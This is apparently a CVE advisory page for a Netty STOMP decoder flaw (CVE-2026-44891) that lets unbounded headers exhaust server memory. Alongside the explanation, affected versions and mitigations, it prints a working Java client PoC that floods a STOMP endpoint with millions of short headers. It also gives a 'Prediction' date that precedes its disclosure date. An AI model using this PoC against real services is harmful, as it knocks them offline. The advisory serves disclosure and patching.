Netty STOMP, Unbounded Headers DoS, CVE-2026-44891 (High) -DC-Jul2026-969

Listen to this Post

Intro

The vulnerability exists in io.netty.handler.codec.stomp.StompSubframeDecoder, the Netty component responsible for decoding STOMP protocol frames. While the decoder provides a `maxLineLength` parameter to restrict the length of individual header lines, it lacks any mechanism to limit the total number of headers or their cumulative size within a single STOMP frame.
An attacker can exploit this by sending a STOMP frame containing an extremely large number of short headers, such as repeated `a: 1\n` lines. The decoder accumulates all these headers in memory inside a `DefaultStompHeadersSubframe` object. Because there is no upper bound on the total number of headers, this accumulation continues unchecked until the JVM’s heap memory is exhausted, resulting in an OutOfMemoryError.
This effectively crashes the server or makes it unresponsive, leading to a Denial of Service (DoS). The attack requires minimal resources from the attacker—a single malicious STOMP message is sufficient to exhaust the server’s memory. Any server exposing a STOMP endpoint that uses this vulnerable decoder is at risk.
The issue affects Netty versions `4.1.0.Final` through `4.1.135.Final` and `4.2.0.Alpha1` through 4.2.15.Final. The flaw was addressed in versions `4.1.136.Final` and 4.2.16.Final.

DailyCVE Form:

Platform: ……. Netty
Version: …….. 4.1.0-4.1.135, 4.2.0-4.2.15
Vulnerability :…… Unbounded Headers DoS
Severity: ……. High
date: ………. 2026-07-14

Prediction: …… 2026-05-04

What Undercode Say:

Analytics:

  • Attack Vector: Network-based, unauthenticated
  • Exploit Complexity: Low (simple crafted STOMP frame)
  • Impact: Denial of Service (Service Crash/Unresponsiveness)
  • Affected Component: `io.netty.handler.codec.stomp.StompSubframeDecoder`
    – Root Cause: Missing cumulative size limit for STOMP headers

Bash Commands & Codes:

Check your Netty version in a Maven project
mvn dependency:tree | grep netty-codec-stomp
Check in a Gradle project
gradle dependencies | grep netty-codec-stomp
Run the vulnerable server with limited heap to demonstrate OOM
java -Xmx256m -cp target/classes ServerApp

Vulnerable Server Code (PoC):

public final class ServerApp {
public static void main(String[] args) throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
ChannelFuture serverFuture = new ServerBootstrap()
.group(group)
.channel(NioServerSocketChannel.class)
.childHandler(new StompSubframeDecoder()) // No header limit
.bind(8080)
.sync();
serverFuture.channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}

Malicious Client Code (PoC):

public final class ClientApp {
public static void main(String[] args) throws Exception {
try (Socket socket = new Socket("127.0.0.1", 8080)) {
OutputStream out = socket.getOutputStream();
out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for (int i = 0; i < 1000; i++) {
sb.append("a:1\n");
}
byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);
for (int i = 1; i <= 50_000; i++) {
out.write(bulkHeaders);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}

Exploit:

An attacker opens a TCP connection to the vulnerable STOMP endpoint and sends a `CONNECT` frame followed by a massive number of short headers (e.g., 50,000 repetitions of a: 1\n). The server’s `StompSubframeDecoder` processes each header, storing them in memory without any cumulative limit. This causes the JVM heap to fill rapidly, triggering an `OutOfMemoryError` and crashing the service. The attack can be performed with minimal bandwidth and no authentication.

Protection:

  • Upgrade Netty to version `4.1.136.Final` or `4.2.16.Final` or later, which include the fix that limits the total number and cumulative size of headers.
  • If an immediate upgrade is not possible, consider implementing a custom frame decoder that enforces a limit on the total number of headers or their total size before passing the frame to StompSubframeDecoder.
  • Deploy a reverse proxy or Web Application Firewall (WAF) in front of the STOMP service to filter or block messages with an excessive number of headers.
  • Monitor JVM memory usage and set up alerts for abnormal heap consumption to detect potential DoS attempts early.

Impact:

Denial of Service (DoS): An attacker can exhaust the server’s memory by sending a single malicious STOMP message, causing an `OutOfMemoryError` that crashes the JVM or renders the service unresponsive. This requires minimal resources from the attacker and can be executed remotely without authentication. Any server exposing a STOMP endpoint that relies on the vulnerable `StompSubframeDecoder` is affected. The vulnerability has a High severity rating due to the ease of exploitation and the significant impact on service availability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top